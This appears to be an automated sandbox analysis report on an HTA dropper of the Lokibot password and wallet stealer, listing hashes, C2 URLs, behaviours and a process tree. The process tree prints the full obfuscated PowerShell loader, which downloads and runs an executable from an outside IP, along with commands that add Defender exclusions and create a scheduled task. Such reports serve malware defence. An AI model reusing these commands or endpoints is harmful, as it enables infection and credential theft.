Analysis

  • max time kernel
    148s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 07:19

General

  • Target

    greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta

  • Size

    178KB

  • MD5

    4ce3b0e612e1968b6c491ab1ab818884

  • SHA1

    cbc890a816e9b7e993c90fb63d51526a76616323

  • SHA256

    a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0

  • SHA512

    9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816

  • SSDEEP

    96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4372
    • C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
      "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4064
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4672
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDAB0.tmp" "c:\Users\Admin\AppData\Local\Temp\5jeux4ci\CSC8265DFDF4E4A4F1DACE6C6829FB3C9F8.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1628
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:320
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1532
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4E79.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4224
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:4672
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:3920
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:912
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2744

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRShelL.EXe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    176B

    MD5

    edc4145054dc88b6cd901d5e677eb7a4

    SHA1

    f3d163b1f7a6c3960320b549c9bd62f1cd283f54

    SHA256

    5a8fa8f8f4b330ca08e906e7e501af32d4f2125c8f93a1509e710d0be0bfbcb9

    SHA512

    3525dc70ada2e5b9ad2b5af60a06cac4c32d08f457cd304a6f585e99912936a501bd4dcc4179b8fa3a2a8da61ab3f7a82153aa055bf2832d89a89b4d0fbad314

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    85c8839aeeb7ec3d26c6eda556b54b41

    SHA1

    a6fd28cdf822b5886909e3159f03826b39573b22

    SHA256

    39ccaad6c32ae17c090e33b8f04f4d931d868184b5db284208e0d7def0b14702

    SHA512

    da91140869e6d7ebf07e7b7c58188b279105397d5ff6f715d5a2986edc5754024bf154e989194b41e4bdf2c2deb77e4c001ea869c9b10fc9a83c5e96f706a68b

  • C:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.dll

    Filesize

    3KB

    MD5

    9579c39867cc3a948b9672f2f299ec7e

    SHA1

    b2ac3e3905fa66377ad8dcf752a689514d1074f2

    SHA256

    1faa2da995ad3858c5318c519b9ef1bcc29487cbbf82e13e6d119d3f2ae0f726

    SHA512

    3498aa35dd1c8d7ea6a52c26183f6c992ab63e6d24b9eeaaf2d59e90aa04e3bf30d999252e745b4eba1b713412edce63da4503b68e7139d4ea30a14ec5d2c8a8

  • C:\Users\Admin\AppData\Local\Temp\RESDAB0.tmp

    Filesize

    1KB

    MD5

    6c778c10cd9806dc88b5a362b7dbaf08

    SHA1

    b75e7b22df0c281abc3a3446fb2e47c74c2e9234

    SHA256

    181fe92b953876aca806f6e46991beb6251c8341032a02809a320814172fc72e

    SHA512

    35e89ea42b155a693ff27a59c7b5a6cb4dd2f6617ff8de740e41cc8866acff2e9aa7fb4f8f4a56df09808405b3919c221a474d91641018cb95c6d7a8974ae239

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pcurmcxv.of4.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmp4E79.tmp

    Filesize

    1KB

    MD5

    53a4d49bd03963beb41dfb68ac4dc24e

    SHA1

    80b6acff7c57e0a48d4751516ccedb5fd831f922

    SHA256

    2c9eb72413dd90a7a15d0275ca8930e76fede3a8d3340ba834bd7571b862aa48

    SHA512

    9d1a16e3cabc2cd51745b78fa7899c695c0c88b3254a9cdc0985efe3da21f86c6d480636bbd0071f850c3162786f5e65a01b68d4398629c3ce4c425cf2eeef05

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    586KB

    MD5

    74061922f1e78c237a66d12a15a18181

    SHA1

    e31ee444aaa552a100f006e43f0810497a3b0387

    SHA256

    89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c

    SHA512

    306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

  • \??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.0.cs

    Filesize

    484B

    MD5

    fe82050659a8b97690d60529499222c1

    SHA1

    7cc50135852b46dd1e36f2ff98506613db525a68

    SHA256

    64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a

    SHA512

    59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

  • \??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.cmdline

    Filesize

    369B

    MD5

    8c9b7ff1a72ad5387d3f27fe085a93a7

    SHA1

    593b1e1dd89eebe43407175401d80f1ba30537a1

    SHA256

    b778e917038d306ed064959f34d972da79c849d3057db4f8094fb6092fc51b10

    SHA512

    53185cca2dadc75985423cb568d996489860531ab0acf3b90a607cb0874ba59e0928402a062ad239f7362a7481a578ffa4032463bfc5078544f649e13d73b4bd

  • \??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\CSC8265DFDF4E4A4F1DACE6C6829FB3C9F8.TMP

    Filesize

    652B

    MD5

    091690bba9ad6c5821e3a1bee115630f

    SHA1

    d400de84e80751b7e40760030efdd9ee67b3b60e

    SHA256

    81f8f0222fdb5722451c7796f1af8b306bda81d7bd796edc15a85968fad7cada

    SHA512

    e5499895904c43bfb9bfa80a93a751d806704b099667f1dd6d9f8c16398d77425006d30c150952fb4e16f2d81071080fc1d6782e02b64481ebdb3e0179b402eb

  • memory/320-147-0x0000000007950000-0x0000000007961000-memory.dmp

    Filesize

    68KB

  • memory/320-133-0x00000000075F0000-0x0000000007693000-memory.dmp

    Filesize

    652KB

  • memory/320-123-0x000000006D5A0000-0x000000006D5EC000-memory.dmp

    Filesize

    304KB

  • memory/320-122-0x0000000006970000-0x00000000069BC000-memory.dmp

    Filesize

    304KB

  • memory/320-157-0x0000000007990000-0x00000000079A4000-memory.dmp

    Filesize

    80KB

  • memory/320-94-0x0000000005D80000-0x00000000060D4000-memory.dmp

    Filesize

    3.3MB

  • memory/1532-137-0x000000006D5A0000-0x000000006D5EC000-memory.dmp

    Filesize

    304KB

  • memory/1736-85-0x0000000005420000-0x00000000054B2000-memory.dmp

    Filesize

    584KB

  • memory/1736-86-0x00000000055B0000-0x00000000055BA000-memory.dmp

    Filesize

    40KB

  • memory/1736-84-0x0000000005930000-0x0000000005ED4000-memory.dmp

    Filesize

    5.6MB

  • memory/1736-82-0x0000000000AC0000-0x0000000000B58000-memory.dmp

    Filesize

    608KB

  • memory/1736-87-0x00000000056C0000-0x000000000575C000-memory.dmp

    Filesize

    624KB

  • memory/1736-88-0x0000000005690000-0x00000000056A2000-memory.dmp

    Filesize

    72KB

  • memory/1736-89-0x0000000006D90000-0x0000000006DF4000-memory.dmp

    Filesize

    400KB

  • memory/2744-120-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2744-116-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2744-167-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2744-175-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4064-65-0x00000000060C0000-0x00000000060C8000-memory.dmp

    Filesize

    32KB

  • memory/4064-83-0x0000000070700000-0x0000000070EB0000-memory.dmp

    Filesize

    7.7MB

  • memory/4064-73-0x0000000070700000-0x0000000070EB0000-memory.dmp

    Filesize

    7.7MB

  • memory/4064-67-0x000000007070E000-0x000000007070F000-memory.dmp

    Filesize

    4KB

  • memory/4064-0-0x000000007070E000-0x000000007070F000-memory.dmp

    Filesize

    4KB

  • memory/4064-1-0x0000000004520000-0x0000000004556000-memory.dmp

    Filesize

    216KB

  • memory/4064-2-0x0000000004D20000-0x0000000005348000-memory.dmp

    Filesize

    6.2MB

  • memory/4064-19-0x0000000005B30000-0x0000000005B7C000-memory.dmp

    Filesize

    304KB

  • memory/4064-72-0x0000000070700000-0x0000000070EB0000-memory.dmp

    Filesize

    7.7MB

  • memory/4064-3-0x0000000070700000-0x0000000070EB0000-memory.dmp

    Filesize

    7.7MB

  • memory/4064-4-0x0000000070700000-0x0000000070EB0000-memory.dmp

    Filesize

    7.7MB

  • memory/4064-5-0x0000000004C40000-0x0000000004C62000-memory.dmp

    Filesize

    136KB

  • memory/4064-6-0x0000000005440000-0x00000000054A6000-memory.dmp

    Filesize

    408KB

  • memory/4064-7-0x00000000054B0000-0x0000000005516000-memory.dmp

    Filesize

    408KB

  • memory/4064-17-0x0000000005520000-0x0000000005874000-memory.dmp

    Filesize

    3.3MB

  • memory/4064-18-0x0000000005B00000-0x0000000005B1E000-memory.dmp

    Filesize

    120KB

  • memory/4672-48-0x00000000072A0000-0x00000000072B4000-memory.dmp

    Filesize

    80KB

  • memory/4672-30-0x000000006CFC0000-0x000000006D00C000-memory.dmp

    Filesize

    304KB

  • memory/4672-29-0x0000000006EF0000-0x0000000006F22000-memory.dmp

    Filesize

    200KB

  • memory/4672-40-0x0000000006300000-0x000000000631E000-memory.dmp

    Filesize

    120KB

  • memory/4672-41-0x0000000006F30000-0x0000000006FD3000-memory.dmp

    Filesize

    652KB

  • memory/4672-42-0x00000000076B0000-0x0000000007D2A000-memory.dmp

    Filesize

    6.5MB

  • memory/4672-43-0x0000000007060000-0x000000000707A000-memory.dmp

    Filesize

    104KB

  • memory/4672-44-0x00000000070C0000-0x00000000070CA000-memory.dmp

    Filesize

    40KB

  • memory/4672-45-0x00000000072F0000-0x0000000007386000-memory.dmp

    Filesize

    600KB

  • memory/4672-46-0x0000000007260000-0x0000000007271000-memory.dmp

    Filesize

    68KB

  • memory/4672-47-0x0000000007290000-0x000000000729E000-memory.dmp

    Filesize

    56KB

  • memory/4672-49-0x00000000073B0000-0x00000000073CA000-memory.dmp

    Filesize

    104KB

  • memory/4672-50-0x00000000072E0000-0x00000000072E8000-memory.dmp

    Filesize

    32KB